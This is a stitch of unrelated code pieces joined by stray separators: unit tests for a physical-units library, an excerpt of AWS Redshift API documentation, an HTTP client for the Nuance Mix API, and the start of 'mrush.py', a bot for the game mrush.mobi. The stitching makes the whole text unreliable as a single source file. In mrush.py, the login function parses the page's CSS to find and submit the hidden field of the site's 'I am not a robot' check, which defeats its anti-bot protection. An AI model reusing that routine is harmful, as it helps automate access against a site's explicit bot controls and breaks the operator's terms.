self.assertEqual(q.units, "amu*angstrom^2")
################################################################################
class TestLength(unittest.TestCase):
"""
Contains unit tests of the Length unit type object.
"""
def test_m(self):
"""
Test the creation of a length quantity with units of m.
"""
q = quantity.Length(1.0,"m")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m")
def test_km(self):
"""
Test the creation of a length quantity with units of km.
"""
q = quantity.Length(1.0,"km")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e3, delta=1e-3)
self.assertEqual(q.units, "km")
def test_cm(self):
"""
Test the creation of a length quantity with units of cm.
"""
q = quantity.Length(1.0,"cm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-2, delta=1e-8)
self.assertEqual(q.units, "cm")
def test_mm(self):
"""
Test the creation of a length quantity with units of mm.
"""
q = quantity.Length(1.0,"mm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-3, delta=1e-9)
self.assertEqual(q.units, "mm")
def test_um(self):
"""
Test the creation of a length quantity with units of um.
"""
q = quantity.Length(1.0,"um")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-6, delta=1e-12)
self.assertEqual(q.units, "um")
def test_nm(self):
"""
Test the creation of a length quantity with units of nm.
"""
q = quantity.Length(1.0,"nm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-9, delta=1e-15)
self.assertEqual(q.units, "nm")
def test_pm(self):
"""
Test the creation of a length quantity with units of pm.
"""
q = quantity.Length(1.0,"pm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-12, delta=1e-18)
self.assertEqual(q.units, "pm")
################################################################################
class TestMass(unittest.TestCase):
"""
Contains unit tests of the Mass unit type object.
Note that value_si is always kg (per molecule), not kg/mol.
"""
def test_kg(self):
"""
Test the creation of a mass quantity with units of kg.
"""
q = quantity.Mass(1.0,"kg")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "kg")
def test_gpermol(self):
"""
Test the creation of a mass quantity with units of g/mol.
Note that g/mol is automatically coerced to amu.
"""
q = quantity.Mass(1.0,"g/mol")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, constants.amu, delta=1e-32)
self.assertEqual(q.units, "amu")
def test_kgpermol(self):
"""
Test the creation of a mass quantity with units of kg/mol.
Note that kg/mol is automatically coerced to amu.
"""
q = quantity.Mass(1.0,"kg/mol")
self.assertAlmostEqual(q.value, 1000.0, 3)
self.assertAlmostEqual(q.value_si, 1000.*constants.amu, delta=1e-29)
self.assertEqual(q.units, "amu")
def test_amu(self):
"""
Test the creation of a mass quantity with units of amu.
"""
q = quantity.Mass(1.0,"amu")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, constants.amu, delta=1e-32)
self.assertEqual(q.units, "amu")
################################################################################
class TestMomentum(unittest.TestCase):
"""
Contains unit tests of the Momentum unit type object.
"""
def test_kgmpers2(self):
"""
Test the creation of a momentum quantity with units of kg*m/s^2.
"""
q = quantity.Momentum(1.0,"kg*m/s^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "kg*m/s^2")
################################################################################
class TestPower(unittest.TestCase):
"""
Contains unit tests of the Power unit type object.
"""
def test_W(self):
"""
Test the creation of a power quantity with units of W.
"""
q = quantity.Power(1.0,"W")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "W")
################################################################################
class TestPressure(unittest.TestCase):
"""
Contains unit tests of the Pressure unit type object.
"""
def test_Pa(self):
"""
Test the creation of a pressure quantity with units of Pa.
"""
q = quantity.Pressure(1.0,"Pa")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "Pa")
def test_bar(self):
"""
Test the creation of a pressure quantity with units of bar.
"""
q = quantity.Pressure(1.0,"bar")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e5, delta=1e-6)
self.assertEqual(q.units, "bar")
def test_atm(self):
"""
Test the creation of a pressure quantity with units of atm.
"""
q = quantity.Pressure(1.0,"atm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 101325., delta=1e-6)
self.assertEqual(q.units, "atm")
def test_torr(self):
"""
Test the creation of a pressure quantity with units of torr.
"""
q = quantity.Pressure(1.0,"torr")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 101325./760., delta=1e-6)
self.assertEqual(q.units, "torr")
def test_psi(self):
"""
Test the creation of a pressure quantity with units of psi.
"""
q = quantity.Pressure(1.0,"psi")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 101325./14.695949, delta=1e-2)
self.assertEqual(q.units, "psi")
################################################################################
class TestRateCoefficient(unittest.TestCase):
"""
Contains unit tests of the RateCoefficient unit type object.
"""
def test_s(self):
"""
Test the creation of a rate coefficient quantity with units of s^-1.
"""
q = quantity.RateCoefficient(1.0,"s^-1")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "s^-1")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1.0, places=1) # 1 /s = 1 /s
def test_m3permols(self):
"""
Test the creation of a rate coefficient quantity with units of m^3/(mol*s).
"""
q = quantity.RateCoefficient(1.0,"m^3/(mol*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m^3/(mol*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e6, places=1) # 1 m3/mol/s = 1e6 cm3/mol/s
def test_m6permol2s(self):
"""
Test the creation of a rate coefficient quantity with units of m^6/(mol^2*s).
"""
q = quantity.RateCoefficient(1.0,"m^6/(mol^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m^6/(mol^2*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e12, places=1) # 1 m6/mol2/s = 1e12 cm6/mol2/s
def test_m9permol3s(self):
"""
Test the creation of a rate coefficient quantity with units of m^9/(mol^3*s).
"""
q = quantity.RateCoefficient(1.0,"m^9/(mol^3*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m^9/(mol^3*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e18, delta=1e3) # 1 m9/mol3/s = 1e18 cm9/mol3/s
def test_cm3permols(self):
"""
Test the creation of a rate coefficient quantity with units of cm^3/(mol*s).
"""
q = quantity.RateCoefficient(1.0,"cm^3/(mol*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*1e6, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^3/(mol*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e6, places=1) # 1 m3/mol/s = 1 cm3/mol/s
def test_cm6permol2s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^6/(mol^2*s).
"""
q = quantity.RateCoefficient(1.0,"cm^6/(mol^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6)**2, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^6/(mol^2*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e12, places=1) # 1 m6/mol2/s = 1e12 cm6/mol2/s
def test_cm9permol3s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^9/(mol^3*s).
"""
q = quantity.RateCoefficient(1.0,"cm^9/(mol^3*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6)**3, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^9/(mol^3*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e18, delta=1e3) # 1 m9/mol3/s = 1e18 cm9/mol3/s
def test_cm3permolecules(self):
"""
Test the creation of a rate coefficient quantity with units of cm^3/(molecule*s).
"""
q = quantity.RateCoefficient(1.0,"cm^3/(molecule*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*1e6/constants.Na, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^3/(molecule*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e6, delta=1e0) # 1 m3/mol/s = 1e6 cm3/mol/s
def test_cm6permolecule2s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^6/(molecule^2*s).
"""
q = quantity.RateCoefficient(1.0,"cm^6/(molecule^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6/constants.Na)**2, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^6/(molecule^2*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e12 , delta=1e0) # 1 m6/mol2/s = 1e12 cm6/mol2/s
def test_cm9permolecule3s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^9/(molecule^3*s).
"""
q = quantity.RateCoefficient(1.0,"cm^9/(molecule^3*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6/constants.Na)**3, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^9/(molecule^3*s)")
print q.units
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e18 , delta=1e3) # 1 m9/mole3/s = 1e18 cm9/mol3/s
################################################################################
class TestTemperature(unittest.TestCase):
"""
Contains unit tests of the Temperature unit type object.
"""
def test_K(self):
"""
Test the creation of a temperature quantity with units of K.
"""
q = quantity.Temperature(1.0,"K")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "K")
def test_degC(self):
"""
Test the creation of a temperature quantity with units of degrees C.
"""
with self.assertRaises(NotImplementedError):
q = quantity.Temperature(1.0,"degC")
def test_degF(self):
"""
Test the creation of a temperature quantity with units of degrees F.
"""
with self.assertRaises(NotImplementedError):
q = quantity.Temperature(1.0,"degF")
def test_degR(self):
"""
Test the creation of a temperature quantity with units of degrees R.
"""
with self.assertRaises(NotImplementedError):
q = quantity.Temperature(1.0,"degR")
################################################################################
class TestTime(unittest.TestCase):
"""
Contains unit tests of the Time unit type object.
"""
def test_s(self):
"""
Test the creation of a time quantity with units of s.
"""
q = quantity.Time(1.0,"s")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "s")
def test_ms(self):
"""
Test the creation of a time quantity with units of ms.
"""
q = quantity.Time(1.0,"ms")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-3, delta=1e-9)
self.assertEqual(q.units, "ms")
def test_us(self):
"""
Test the creation of a time quantity | |
KMS and None. For the China region the possible values are None, and Legacy.
- **ClusterVersion** *(string) --*
The version ID of the Amazon Redshift engine that is running on the cluster.
- **AllowVersionUpgrade** *(boolean) --*
A boolean value that, if ``true`` , indicates that major version upgrades will be applied automatically to the cluster during the maintenance window.
- **NumberOfNodes** *(integer) --*
The number of compute nodes in the cluster.
- **PubliclyAccessible** *(boolean) --*
A boolean value that, if ``true`` , indicates that the cluster can be accessed from a public network.
- **Encrypted** *(boolean) --*
A boolean value that, if ``true`` , indicates that data in the cluster is encrypted at rest.
- **RestoreStatus** *(dict) --*
A value that describes the status of a cluster restore action. This parameter returns null if the cluster was not created by restoring a snapshot.
- **Status** *(string) --*
The status of the restore action. Returns starting, restoring, completed, or failed.
- **CurrentRestoreRateInMegaBytesPerSecond** *(float) --*
The number of megabytes per second being transferred from the backup storage. Returns the average rate for a completed backup.
- **SnapshotSizeInMegaBytes** *(integer) --*
The size of the set of snapshot data used to restore the cluster.
- **ProgressInMegaBytes** *(integer) --*
The number of megabytes that have been transferred from snapshot storage.
- **ElapsedTimeInSeconds** *(integer) --*
The amount of time an in-progress restore has been running, or the amount of time it took a completed restore to finish.
- **EstimatedTimeToCompletionInSeconds** *(integer) --*
The estimate of the time remaining before the restore will complete. Returns 0 for a completed restore.
- **DataTransferProgress** *(dict) --*
- **Status** *(string) --*
Describes the status of the cluster. While the transfer is in progress the status is ``transferringdata`` .
- **CurrentRateInMegaBytesPerSecond** *(float) --*
Describes the data transfer rate in MB's per second.
- **TotalDataInMegaBytes** *(integer) --*
Describes the total amount of data to be transfered in megabytes.
- **DataTransferredInMegaBytes** *(integer) --*
Describes the total amount of data that has been transfered in MB's.
- **EstimatedTimeToCompletionInSeconds** *(integer) --*
Describes the estimated number of seconds remaining to complete the transfer.
- **ElapsedTimeInSeconds** *(integer) --*
Describes the number of seconds that have elapsed during the data transfer.
- **HsmStatus** *(dict) --*
A value that reports whether the Amazon Redshift cluster has finished applying any hardware security module (HSM) settings changes specified in a modify cluster command.
Values: active, applying
- **HsmClientCertificateIdentifier** *(string) --*
Specifies the name of the HSM client certificate the Amazon Redshift cluster uses to retrieve the data encryption keys stored in an HSM.
- **HsmConfigurationIdentifier** *(string) --*
Specifies the name of the HSM configuration that contains the information the Amazon Redshift cluster can use to retrieve and store keys in an HSM.
- **Status** *(string) --*
Reports whether the Amazon Redshift cluster has finished applying any HSM settings changes specified in a modify cluster command.
Values: active, applying
- **ClusterSnapshotCopyStatus** *(dict) --*
A value that returns the destination region and retention period that are configured for cross-region snapshot copy.
- **DestinationRegion** *(string) --*
The destination region that snapshots are automatically copied to when cross-region snapshot copy is enabled.
- **RetentionPeriod** *(integer) --*
The number of days that automated snapshots are retained in the destination region after they are copied from a source region.
- **ManualSnapshotRetentionPeriod** *(integer) --*
The number of days that automated snapshots are retained in the destination region after they are copied from a source region. If the value is -1, the manual snapshot is retained indefinitely.
The value must be either -1 or an integer between 1 and 3,653.
- **SnapshotCopyGrantName** *(string) --*
The name of the snapshot copy grant.
- **ClusterPublicKey** *(string) --*
The public key for the cluster.
- **ClusterNodes** *(list) --*
The nodes in the cluster.
- *(dict) --*
The identifier of a node in a cluster.
- **NodeRole** *(string) --*
Whether the node is a leader node or a compute node.
- **PrivateIPAddress** *(string) --*
The private IP address of a node within a cluster.
- **PublicIPAddress** *(string) --*
The public IP address of a node within a cluster.
- **ElasticIpStatus** *(dict) --*
The status of the elastic IP (EIP) address.
- **ElasticIp** *(string) --*
The elastic IP (EIP) address for the cluster.
- **Status** *(string) --*
The status of the elastic IP (EIP) address.
- **ClusterRevisionNumber** *(string) --*
The specific revision number of the database in the cluster.
- **Tags** *(list) --*
The list of tags for the cluster.
- *(dict) --*
A tag consisting of a name/value pair for a resource.
- **Key** *(string) --*
The key, or name, for the resource tag.
- **Value** *(string) --*
The value for the resource tag.
- **KmsKeyId** *(string) --*
The AWS Key Management Service (AWS KMS) key ID of the encryption key used to encrypt data in the cluster.
- **EnhancedVpcRouting** *(boolean) --*
An option that specifies whether to create the cluster with enhanced VPC routing enabled. To create a cluster that uses enhanced VPC routing, the cluster must be in a VPC. For more information, see `Enhanced VPC Routing <https://docs.aws.amazon.com/redshift/latest/mgmt/enhanced-vpc-routing.html>`__ in the Amazon Redshift Cluster Management Guide.
If this option is ``true`` , enhanced VPC routing is enabled.
Default: false
- **IamRoles** *(list) --*
A list of AWS Identity and Access Management (IAM) roles that can be used by the cluster to access other AWS services.
- *(dict) --*
An AWS Identity and Access Management (IAM) role that can be used by the associated Amazon Redshift cluster to access other AWS services.
- **IamRoleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role, for example, ``arn:aws:iam::123456789012:role/RedshiftCopyUnload`` .
- **ApplyStatus** *(string) --*
A value that describes the status of the IAM role's association with an Amazon Redshift cluster.
The following are possible statuses and descriptions.
* ``in-sync`` : The role is available for use by the cluster.
* ``adding`` : The role is in the process of being associated with the cluster.
* ``removing`` : The role is in the process of being disassociated with the cluster.
- **PendingActions** *(list) --*
Cluster operations that are waiting to be started.
- *(string) --*
- **MaintenanceTrackName** *(string) --*
The name of the maintenance track for the cluster.
- **ElasticResizeNumberOfNodeOptions** *(string) --*
The number of nodes that you can resize the cluster to with the elastic resize method.
- **DeferredMaintenanceWindows** *(list) --*
Describes a group of ``DeferredMaintenanceWindow`` objects.
- *(dict) --*
Describes a deferred maintenance window
- **DeferMaintenanceIdentifier** *(string) --*
A unique identifier for the maintenance window.
- **DeferMaintenanceStartTime** *(datetime) --*
A timestamp for the beginning of the time period when we defer maintenance.
- **DeferMaintenanceEndTime** *(datetime) --*
A timestamp for the end of the time period when we defer maintenance.
- **SnapshotScheduleIdentifier** *(string) --*
A unique identifier for the cluster snapshot schedule.
- **SnapshotScheduleState** *(string) --*
The current state of the cluster snapshot schedule.
- **ResizeInfo** *(dict) --*
Returns the following:
* AllowCancelResize: a boolean value indicating if the resize operation can be cancelled.
* ResizeType: Returns ClassicResize
- **ResizeType** *(string) --*
Returns the value ``ClassicResize`` .
- **AllowCancelResize** *(boolean) --*
A boolean value indicating if the resize operation can be cancelled.
:type ClusterIdentifier: string
:param ClusterIdentifier: **[REQUIRED]**
The unique identifier of the cluster for which you want to associate or disassociate IAM roles.
:type AddIamRoles: list
:param AddIamRoles:
Zero or more | |
"""
Classes on handling HTTP requests towards Mix API endpoints
"""
from abc import ABCMeta, abstractmethod
import copy
import json
from typing import Optional, Union, List, Dict, Callable, Any, Tuple
import requests
import re
from io import BytesIO
from requests import Response
from .logging import Loggable
from .auth import MixApiAuthToken, MixApiAuthHandler, MixApiAuthTokenExpirationError
from . import truncate_long_str
DEFAULT_API_HOST = 'https://mix.nuance.com'
DEFAULT_API_PATH_PREFIX = '/v3'
URL_PATH_SEP = '/'
"""Default Mix production server for API requests"""
GET_METHOD = "GET"
POST_METHOD = "POST"
DELETE_METHOD = "DELETE"
PUT_METHOD = 'PUT'
SUPPORTED_HTTP_METHODS = {GET_METHOD, POST_METHOD, DELETE_METHOD, PUT_METHOD}
DEFAULT_API_REQUEST_HEADERS = {'accept': 'application/json', 'Connection': 'keep-alive',
'Authorization': 'Bearer {token}'}
_PTN_HEADER_VALUE_AUTH_TOKEN = re.compile(r'^Bearer\s+')
API_RESP_DATA_FIELD = 'data'
# typing hint alias
RequestResult = Union[bool, str, int, bytes, Dict, Response]
def get_api_resp_payload_data(payload_json: Dict, reduce_list: bool = True) -> Optional[Union[Dict, List]]:
"""
Get the 'data' field from API response payload
:param payload_json:
:param reduce_list: Reduce the list from data field if there is only one element
:return:
"""
if API_RESP_DATA_FIELD not in payload_json:
return payload_json
payload_json_data: Union[Dict, str] = payload_json[API_RESP_DATA_FIELD]
if isinstance(payload_json_data, list):
if not payload_json_data:
return None
if len(payload_json_data) > 1:
return payload_json_data
if reduce_list:
return payload_json_data[0]
else:
return payload_json_data
else:
return payload_json_data
def proc_headers_token_for_log(headers: Optional[Dict[str, Union[str, Any]]],
no_token: Optional[bool] = True) -> str:
"""
Produce a representive string on HTTP headers, optionally removing auth token
:param headers: HTTP headers
:param no_token: whether or not token should be remove from Authorization header
:return: A representive string for display purpose
"""
if not headers:
return '{}'
headers_repr = dict()
for k, v in headers.items():
if no_token and k == 'Authorization' \
and isinstance(v, str) and _PTN_HEADER_VALUE_AUTH_TOKEN.search(v):
headers_repr[k] = 'Bearer ...'
else:
headers_repr[k] = v
return json.dumps(headers_repr)
# noinspection PyUnusedLocal
def default_token_expire_action(auth_token: Optional[MixApiAuthToken] = None):
"""
Default action when
:return: None
"""
raise MixApiAuthTokenExpirationError("Mix auth token has expired")
def chk_err_in_payload(json_payload, exc: bool = True):
"""
Check if there are error(s) indicated in response.
:param json_payload:
:param exc: Should raise exception if error found.
"""
err_fields = {'error', 'errors'}
for errf in err_fields:
if errf in json_payload and json_payload[errf]:
if exc:
raise RuntimeError(f'Response marked with {errf}: {json.dumps(json_payload[errf])}')
else:
return True
def validate_mix_resp_error(mix_json_resp: Dict):
"""
Check Mix response with preset error field presences
:param mix_json_resp: Json object of Mix response on API requests
:return: None
"""
chk_err_in_payload(mix_json_resp)
def validate_resp_json_payload(resp_payload: Union[str, Dict],
token_exp_action: Optional[Callable] = None, check_err: bool = True) -> Dict:
"""
Validate HTTP response payload
:param check_err:
:param resp_payload: HTTP response payload, either a literal string of Json or Json object
:param token_exp_action: A function which would be called when auth token is found expired
:return: A Json object
"""
if not resp_payload:
# CURL does not return anything
return json.loads('{}')
try:
if isinstance(resp_payload, str):
json_result = json.loads(resp_payload)
else:
json_result = resp_payload
except Exception as ex:
raise RuntimeError(f"HTTP requests succeeded but returned invalid JSON: {resp_payload}") from ex
orig_json_result = json_result
if 'status' in json_result and json_result['status'] == 'error':
raise RuntimeError(f"Error detected fro request: {resp_payload}")
if check_err:
chk_err_in_payload(json_result)
if 'data' in json_result and json_result['data']:
json_result = json_result['data']
if isinstance(json_result, list):
json_result = json_result[0]
if 'error' in json_result:
if 'status' in json_result['error'] and json_result['error']['status'].lower() == 'unauthorized':
# we know the token has expired
if not token_exp_action:
token_exp_action = default_token_expire_action
token_exp_action()
elif check_err:
chk_err_in_payload(json_result)
elif 'response' in json_result:
validate_mix_resp_error(json_result['response'])
elif check_err:
chk_err_in_payload(json_result)
else:
...
return orig_json_result
class HTTPRequestHandler(Loggable, metaclass=ABCMeta):
"""
Abstract class on handlers for HTTP Requests used in MixCli
"""
def __init__(self, auth_handler: MixApiAuthHandler, name: Optional[str] = None,
log_level: Optional[Union[int, str]] = None, no_token_log: bool = True):
"""
Constructor
:param auth_handler: A MixApiAuthHandler instance from which auth tokens can be requested
:param name: Name of the specific HTTPRequestHandler instance used in logging
:param log_level: Default logging level for the instance
:param no_token_log: Specification on whether or not auth tokens should be removed from logging
"""
self._auth_hdlr = auth_handler
if name:
Loggable.__init__(self, bearer=name, log_level=log_level)
else:
Loggable.__init__(self, bearer=self, log_level=log_level)
self._no_token_log = no_token_log
@property
def name(self):
return 'HTTPReqHdlr'
@property
def no_token_log(self) -> bool:
return self._no_token_log
@no_token_log.setter
def no_token_log(self, new_val: bool):
self._no_token_log = new_val
def get_default_headers(self, auth_token: Optional[str] = None) -> Dict:
"""
Get the default headers for Mix3 API calls.
:return: Json object of default headers to run Curl for Mix API endpoints
"""
headers_copy = copy.copy(DEFAULT_API_REQUEST_HEADERS)
if not auth_token:
self.debug('requesting token from auth handler')
auth_token = self._auth_hdlr.token
headers_copy['Authorization'] = (headers_copy['Authorization']).format(token=auth_token)
return headers_copy
@abstractmethod
def request(self, url: str, method: Optional[str] = None, headers: Optional[Dict] = None,
data: Optional[Union[str, Dict]] = None, default_headers: bool = False, data_as_str: bool = True,
url_fq: bool = False, no_output: bool = False, stream: bool = False, out_file: Optional[str] = None,
json_resp: bool = False, validate_json: bool = True, check_error: bool = True,
need_status: bool = False, byte_resp: bool = False,
**kwargs) -> Optional[Union[RequestResult, Tuple[RequestResult, int]]]:
"""
Send request
:param need_status: Also need status code
:param validate_json: When expecting JSON response, validate the JSON
:param byte_resp: Function should return bytestring as response
:param out_file: Response payload should be directed to an output file
:param stream: Response payload is expected to be returned progressively and should be retrieved as stream.
:param url: Target API endpoint or URL
:param method: HTTP method to use for sending the request
:param headers: HTTP headers used in request
:param data: Payload data used in request
:param default_headers: If should use default HTTP headers for Mix API requests
:param data_as_str: Data should be treated as string
:param url_fq: If function parameter "url" is a fully-qualified URL
:param no_output: Do not expect any output in response
:param json_resp: The response payload is expected to be a valid Json object, array, or value.
:param check_error: If function should perform error-checking on response payload.
:param kwargs:
:return:
"""
...
@abstractmethod
def is_http_method_supported(self, method: str) -> bool:
"""
Check if a HTTP method is supported
:param method: Name of HTTP method
:return: True if this HTTP method is
"""
...
@property
@abstractmethod
def host(self):
...
@property
@abstractmethod
def endpoint_prefix(self):
...
class PyRequestsRunner(HTTPRequestHandler):
"""
Implementation class to query HTTP/HTTPS APIs with "requests" package
"""
def __init__(self, auth_handler: MixApiAuthHandler,
host: Optional[str], log_level: Optional[Union[str, int]] = None,
no_token_log: Optional[bool] = True):
"""
Constructor
:param auth_handler: The MixApiAuthHandler instance used to generate auth token info for request headers
:param host: Host name to send HTTP/HTTPS requests
:param log_level: Log level used in this instance
:param no_token_log: Suppress auth toke from logging messages.
"""
HTTPRequestHandler.__init__(self, auth_handler, self.name, log_level=log_level, no_token_log=no_token_log)
if host:
self._host = host
else:
self._host = DEFAULT_API_HOST
# hostname must not end with '/'
if self._host.endswith(URL_PATH_SEP):
self._host = self._host[:-1]
# endpoint path prefix should start with '/'
self._endpt_prefix = DEFAULT_API_PATH_PREFIX
if not self._endpt_prefix.startswith(URL_PATH_SEP):
self._endpt_prefix = URL_PATH_SEP + self._endpt_prefix
@property
def name(self) -> str:
return 'PyReqRunner'
@classmethod
def requests_method(cls, method: str) -> str:
return method
@property
def host(self) -> str:
return self._host
@property
def endpoint_prefix(self) -> str:
return self._endpt_prefix
def endpoint_url(self, endpoint: str, need_prefix: bool = True) -> str:
if not endpoint.startswith(URL_PATH_SEP):
endpoint = URL_PATH_SEP + endpoint
prefix = self.host
if need_prefix:
prefix += self.endpoint_prefix
return prefix + endpoint
def request(self, url: str, method: Optional[str] = None, headers: Optional[Dict] = None,
data: Optional[Union[str, Dict]] = None, default_headers: bool = False, data_as_str: bool = True,
url_fq: bool = False, stream=False, outfile=None, no_output: bool = False,
json_resp: bool = False, validate_json: bool = True, check_error: bool = True,
byte_resp: bool = False, need_status: bool = False,
**kwargs) -> Optional[Union[RequestResult, Tuple[RequestResult, int]]]:
if json_resp and byte_resp:
raise RuntimeError('Argument json_resp and byte_resp can NOT be both True')
if byte_resp:
stream = True
if not method:
req_method = GET_METHOD
else:
if not self.is_http_method_supported(method):
raise ValueError(f'Given requests HTTP method not supported: {method}')
req_method = self.requests_method(method)
url = url
if not url_fq:
url = self.endpoint_url(url)
if not headers:
if default_headers:
headers = self.get_default_headers()
if data:
if isinstance(data, str):
try:
self.debug(f'data being string: {truncate_long_str(data)}')
if not data_as_str:
data = json.loads(data)
except Exception as ex:
raise ValueError(f'"data" sent to RequestRunner.request is not a valid Json') from ex
else:
data_str = json.dumps(data)
self.debug(f'data being json: {data_str}')
if data_as_str:
data = data_str
self.debug('data will be sent as string in request')
try:
headers_repr = proc_headers_token_for_log(headers, self.no_token_log)
self.debug(f'Running requests with method | |
<filename>mrush.py
#Передаю спасибо и привет https://github.com/Wilidon, если бы не он я бы не разобрался как обойти анти-бот систему
#Связь со мной: @a352642 (telegram)
import os
import time
try:
import requests
from bs4 import BeautifulSoup as BS
except:
print("Installing module 'requests'")
os.system("pip3 install requests -q")
print("Installing module 'beautifulsoup4'")
os.system("pip3 install beautifulsoup4 -q")
class Client:
def __init__(self, name: str, password: str):
self.session = requests.Session()
self.url = "https://mrush.mobi/" #URL нашей игры
self.name = name #Ваше имя в игре
self.password = password #Ваш пароль в игре
self.headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
}
self.login()
def login(self): #Вход в аккаунт
response = self.session.get(self.url+"welcome", headers=self.headers) #Отправка GET запроса на сервер
html = response.text #Получаем HTML код страницы
if "я не робот" in html: #Если есть защита от ботов
soup = BS(html, "html.parser")
elems = soup.findAll("style") #Получаем все элементы системы
for elem in elems:
if "margin-left:" not in str(elem) and "display: none;" not in str(elem) and "overflow: hidden" not in str(elem): #Если этот элемент не спрятан то он нам нужен
correct_elem = str(elem).split(".")[1].split("{")[0] #Отделяем его от кода
correct_elem = soup.find("div", class_=correct_elem).find("input")["name"] #Находим по нему другой нужный нам элемент
request = self.session.post(self.url+"login", headers=self.headers, data={ #Посылаем POST запрос
"name": self.name,
"password": <PASSWORD>,
correct_elem: "" #Элемент который мы нашли
})
if "Неправильное Имя или Пароль" in request.text: #Проверка на валидность данных
return "Incorrect name or password at 'login'"
if "заблокирован" in request.text: #Проверка на блокировку
return "You have been banned"
return "Succesfull"
elif "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.login()
else: #Если нет защиты
request = self.session.post(self.url+"login", headers=self.headers, data={ #Посылаем POST запрос
"name": self.name,
"password": <PASSWORD>
})
#=================================================================
#=======================GET ЗАПРОСЫ===============================
#=================================================================
def profile(self, id: str = None): #Информация из своего или чужого профиля
if id == None: #Если ID не указано то узнаем информацию из своего профиля
response = self.session.get(self.url+"profile", headers=self.headers) #Посылаем GET запрос
else: #Если ID указано то узнаем информацию человека с этим ID
response = self.session.get(self.url+"view_profile?player_id="+id, headers=self.headers) #Посылаем GET запрос
html = response.text #Получаем HTML код страницы
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.profile(id)
soup = BS(html, "html.parser")
elems = soup.findAll("span") #Получаем данные
data = {} #Сюда будут сохранятся обработанные данные
for elem in elems:
if "visibility: hidden" not in str(elem): #Если элемент показан
elem = elem.text.replace("\t", "").replace("\n", "") #Убираем все лишнее
if "уровень" in elem: #Узнаем уровень и имя
data["name"] = elem.split(",")[0].strip()
